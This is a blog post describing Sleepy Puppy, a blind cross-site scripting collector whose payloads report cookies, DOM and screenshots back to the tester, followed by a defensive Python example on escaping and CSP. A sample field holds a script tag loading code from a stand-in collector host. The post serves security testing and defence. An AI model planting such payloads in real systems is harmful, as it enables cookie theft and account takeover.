Pentest Tools

Published on July 17th, 2015

Sleepy Puppy — Blind Cross-site Scripting Collector and Manager

Sleepy Puppy is a blind cross-site scripting (XSS) collector created to simplify blind XSS testing.

Often when testing for client-side injections (HTML/JS/etc.), security engineers look only for where the injection occurs within the application they are testing. While this provides ample coverage for the application in scope, the code being injected may also be reflected back in a completely separate application.

Sleepy Puppy helps facilitate inter-application XSS testing by providing JavaScript payloads that call back to the Sleepy Puppy application.

How Does Sleepy Puppy Do It?

Sleepy Puppy provides a JavaScript payload that security engineers can use for blind XSS testing. The callback functions provided by the JavaScript generate useful capture metadata, including the URI, DOM, user agent, cookies, Referer header, and a screenshot of the page where the payload executed. This allows a tester to generate unique JavaScript payloads and trace which applications they execute in throughout the payload lifecycle.

Sleepy Puppy also supports email notifications for captures received for specific assessments.

Sleepy Puppy exposes an API for users who may want to develop plugins for scanners such as Burp or ZAP.

Blind XSS vulnerabilities are a variant of stored cross-site scripting vulnerabilities. They occur when the attacker's input is saved by the server and later displayed in another application with a different origin.

An example would be the signup form of an eCommerce website. One can imagine a field such as “First Name” that gets reflected back throughout the eCommerce website. But what about the helpdesk application used when a user has a question? That same first name field may get reflected back in the helpdesk application. It is also possible that the helpdesk user logs into yet another application to retrieve more information about you when you ask a question, and that application may also reflect the “First Name” parameter.

Blind cross-site scripting testing lets you follow the flow of ‘data’ submitted to an endpoint to a deeper scope and breadth: every application that later renders that data, not just the one you submitted it to.
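To make the helpdesk scenario above concrete from the defender's side, here is an added example (not Sleepy Puppy's own code) that renders a stored ticket two ways: once by concatenating the stored "First Name" straight into HTML, which is exactly the sink a blind XSS payload needs, and once with output encoding applied at the point of rendering. It also builds a Content-Security-Policy header for the helpdesk responses that confines scripts, images and fetch targets to the application's own origin, so that even a payload that does execute cannot load code from or report back to an external collector. The function names, the `SAMPLE_TICKET` record and the `collector.example` hostname are all constructed for this example.

```python
"""Added example: stored data from another application rendered in a helpdesk
view, vulnerable and hardened, plus a CSP header that limits callback targets.
All names and sample data here are constructed and not from Sleepy Puppy."""
import html

# Constructed sample: a ticket whose first_name was captured by a signup form
# in a *different* application. The helpdesk never validated it because, from
# its point of view, it is just a stored string pulled from the database.
SAMPLE_TICKET = {
    "ticket_id": 4711,
    "first_name": '<script src="https://collector.example/p.js"></script>',
    "question": "Where is my order?",
}


def render_ticket_unsafe(ticket):
    """Vulnerable rendering: stored values are concatenated straight into HTML.
    Whatever the signup application stored in first_name runs here, in the
    helpdesk origin, every time an agent opens the ticket (blind XSS)."""
    return (
        f"<h1>Ticket #{ticket['ticket_id']}</h1>"
        f"<p>From: {ticket['first_name']}</p>"
        f"<p>{ticket['question']}</p>"
    )


def _esc(value):
    """HTML-escape a value for an element body or a quoted attribute."""
    return html.escape(str(value), quote=True)


def render_ticket(ticket):
    """Hardened rendering: every untrusted value is escaped where it is written
    into the document, regardless of which application originally stored it."""
    return (
        f"<h1>Ticket #{_esc(ticket['ticket_id'])}</h1>"
        f"<p>From: {_esc(ticket['first_name'])}</p>"
        f"<p>{_esc(ticket['question'])}</p>"
    )


def csp_header(report_uri=None):
    """Defence in depth: a Content-Security-Policy value that allows scripts,
    images and XHR/fetch targets only from the helpdesk's own origin. A blind
    XSS payload that still executes cannot load its JavaScript from, or send
    captures to, an external collector. Constructed policy; tune per app."""
    directives = [
        "default-src 'self'",
        "script-src 'self'",
        "img-src 'self'",
        "connect-src 'self'",
        "object-src 'none'",
        "base-uri 'self'",
    ]
    if report_uri:
        directives.append(f"report-uri {report_uri}")
    return "; ".join(directives)


def contains_active_markup(rendered_html):
    """Simple check: does the rendered page still carry a live <script tag?"""
    return "<script" in rendered_html


if __name__ == "__main__":
    print(render_ticket_unsafe(SAMPLE_TICKET))
    print(render_ticket(SAMPLE_TICKET))
    print(csp_header("/csp-report"))
```

The escaping belongs in the helpdesk, not in the signup form: the signup application cannot know every context in which a stored name will later be rendered, which is precisely why blind XSS reaches applications the original tester never saw. The CSP `report-uri` directive is also a cheap detection signal; violation reports from the helpdesk origin are a strong hint that stored data is being rendered as markup somewhere.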

Prerequisites

  • Python 2.7
  • pip
  • git

Grab the repo

git clone https://github.com/sbehrens/sleepy-puppy.git
